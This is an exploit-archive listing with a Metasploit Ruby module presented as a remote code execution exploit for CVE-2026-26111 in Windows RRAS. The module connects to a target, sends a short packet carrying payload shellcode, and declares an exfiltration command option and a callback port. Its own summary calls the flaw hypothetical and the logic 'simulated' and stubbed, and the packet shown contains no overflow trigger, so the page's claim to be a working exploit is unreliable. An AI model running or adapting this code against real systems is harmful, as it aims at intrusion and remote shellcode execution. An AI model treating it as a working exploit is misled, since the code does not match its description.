📄 Microsoft Windows RRAS Integer Overflow

🗓️ 31 Mar 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 114 Views

Simulated Windows RRAS integer overflow over TCP; packet for heap overflow and code execution.

Reporter	Title	Published	Views	Family All 39
ATTACKERKB	CVE-2026-26111	10 Mar 202617:05	–	attackerkb
Circl	CVE-2026-26111	10 Mar 202616:57	–	circl
CNNVD	Microsoft Windows Routing and Remote Access Service 输入验证错误漏洞	10 Mar 202600:00	–	cnnvd
CVE	CVE-2026-26111	10 Mar 202617:05	–	cve
Cvelist	CVE-2026-26111 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	10 Mar 202617:05	–	cvelist
EUVD	EUVD-2026-10677	10 Mar 202618:31	–	euvd
Microsoft KB	March 10, 2026—KB5078734 (OS Build 25398.2207)	10 Mar 202614:00	–	mskb
Microsoft KB	March 10, 2026—Hotpatch KB5078736 (OS Build 26100.32463)	10 Mar 202614:00	–	mskb
Microsoft KB	March 10, 2026—Hotpatch KB5078737 (OS Build 20348.4830)	12 May 202614:00	–	mskb
Microsoft KB	March 10, 2026—KB5078740 (OS Build 26100.32522)	10 Mar 202614:00	–	mskb

======================================================================================================================
    | # Title     : Windows RRAS Integer Overflow                                                                        |
    | # Author    : indoushka                                                                                            |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                     |
    | # Vendor    : https://microsoft.com                                                                                |
    ======================================================================================================================
    
    [+] Summary    : This Metasploit module simulates a remote exploitation attempt against a hypothetical integer overflow vulnerability in Windows RRAS, 
                     which could lead to a heap-based overflow and potential remote code execution. 
                     The module establishes a TCP connection to the target, constructs a simplified RPC-like packet containing encoded payload data, and sends it to the service. 
    				 It includes configurable options such as target host, port, callback port, and an optional command parameter for payload execution context.
                     The exploit logic is intentionally simplified, with removed unsafe or broken decoder and overflow mechanisms. Additional features like exfiltration handling are stubbed out for safety and stability. 
    				 The module also includes a basic connectivity check stub and uses standard Metasploit payload handling (payload.encoded) to generate shellcode.
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = Msf::Exploit::Rank::Great
    
      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Windows RRAS Integer Overflow RCE (CVE-2026-26111)',
          'Description'    => %q{
            This module simulates exploitation of an integer overflow in RRAS leading to heap overflow.
          },
          'License'        => MSF_LICENSE,
          'Author'         => [
            'indoushka'
          ],
          'References'     => [
            ['CVE', '2026-26111'],
            ['MSKB', 'KB5084597']
          ],
          'Platform'       => 'win',
          'Targets'        => [
            [ 'Windows 11 x64', { 'Arch' => ARCH_X64 } ]
          ],
          'DefaultOptions' => {
            'RPORT'    => 4444,
            'WfsDelay' => 30
          },
          'Payload' => {
            'Space'    => 4096,
            'BadChars' => "\x00"
          },
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2026-03-22'
        ))
    
        register_options([
          Opt::RHOST(),
          OptPort.new('CALLBACK_PORT', [true, 'Callback port', 4445]),
          OptString.new('EXFIL_CMD', [true, 'Command', 'whoami'])
        ])
      end
    
      def generate_payload
        payload.encoded
      end
    
      def build_packet(shellcode)
        pkt  = "\x05\x00"
        pkt << "\x0b"
        pkt << "\x00\x00\x00\x00"
        pkt << [shellcode.length].pack('V')
        pkt << shellcode
    
        pkt
      end
    
      def exploit
        print_status("Connecting to target #{rhost}:#{rport}...")
    
        connect
    
        shellcode = generate_payload
        packet    = build_packet(shellcode)
    
        print_status("Sending payload (#{packet.length} bytes)...")
        sock.put(packet)
    
        handler
        disconnect
      end
    
      def start_exfiltration_server
        print_status("Exfiltration feature disabled in corrected version (logic stub).")
      end
    
      def check
        print_status("Basic check not implemented (safe stub).")
        Exploit::CheckCode::Unknown
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

31 Mar 2026 00:00Current

6.1Medium risk

Vulners AI Score6.1

CVSS 3.18

EPSS0.0009

SSVC